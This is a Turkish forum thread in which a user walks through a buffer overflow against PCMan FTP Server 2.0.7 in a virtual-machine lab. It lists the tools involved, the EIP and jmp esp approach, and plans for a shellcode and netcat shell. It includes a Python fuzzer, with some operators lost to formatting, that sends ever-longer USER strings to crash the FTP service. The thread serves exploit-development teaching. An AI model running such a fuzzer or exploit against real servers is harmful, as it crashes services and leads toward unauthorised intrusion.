1.                                                

Buffer Overflow Olayını Anlama-1

'Video' forumunda tababa86 tarafından 11 Şubat 2017 tarihinde açılan konu

  1. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    939
    Beğeniler:
    134
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore

    Pcman ftp server 2.0.7 programını kullandım.
    gereklilikler
    *ollydb
    *python 2.7
    *virtualbox(ag nat olacak...)
    *https://www.exploit-db.com/exploits/26471/ #programı indir
    *win xp 32bit sp2-3
    *kali linux
    *python bilgisi (network,socket prog)
    *assembly
    eip sonraki çalısacak proseduru belirler ...oradan jump esp yapılırsa mesela kernel modulune veya baska dll ye shell kodumuzu çalıstırabiliriz..
    Bu videoda daha çok buffer overflow var mı paket yollama ollydb ile izleme adım adım anlamaya çalıstım.Diger bölümlerde eip adresini bulma,badcharlar varsa bulma shell kodu yerleştirip msf3 ile veya nc ile baglamaya çalısacam.

     
  2. tababa86

    tababa86 Albay

    Katılım:
    12 Mart 2016
    Mesaj:
    939
    Beğeniler:
    134
    Ödül Puanları:
    43
    Cinsiyet:
    Erkek
    Şehir:
    Kore
    python kodunu da paylaşıyorum...

    PHP:
    # basit Fuzzer PCMan's FTP Server

    #buffer overflow icin kodlar...


    import syssockettime   #modulleri gir....


    # python da yazilmis fuzz...


    host raw_input('ip adresi :'#   server ipsi

    port int(21# nmap taramasinda 21. portu kullaniyor...


    length 100 #  A'nin  ilkdegeri 100


    while (length 2500): # S  3000 length

     
    client socket.socket(socket.AF_INETsocket.SOCK_STREAM#  TCP socket

     
    client.connect((hostport)) # port,ip

     
    client.recv(1024#  FTP Banner al

     
    client.send("USER " "A" length# A

     
    client.recv(1024# Recieve Reply

     
    client.send("gecen gecti"# tam baglantida gecen ...

     
    client.recv(1024# tekrar al

     
    client.close() # baglantiyi kapa

     
    time.sleep(2# dos atagina karsi uyumayi engelle

     
    print "Length Sent: " str(length# kuldan servere yollanan uzunluk

     
    length += 100 # 100 artir tekrar



    #https://www.exploit-db.com/exploits/26471/
     
  3. sen4tor

    sen4tor Member

    Katılım:
    1 Ocak 2017
    Mesaj:
    67
    Beğeniler:
    15
    Ödül Puanları:
    8
    Cinsiyet:
    Erkek
    Çok faydalı. Paylaşım için teşekkürler
     
    tababa86 bunu beğendi.

Bu Sayfayı Paylaş

Share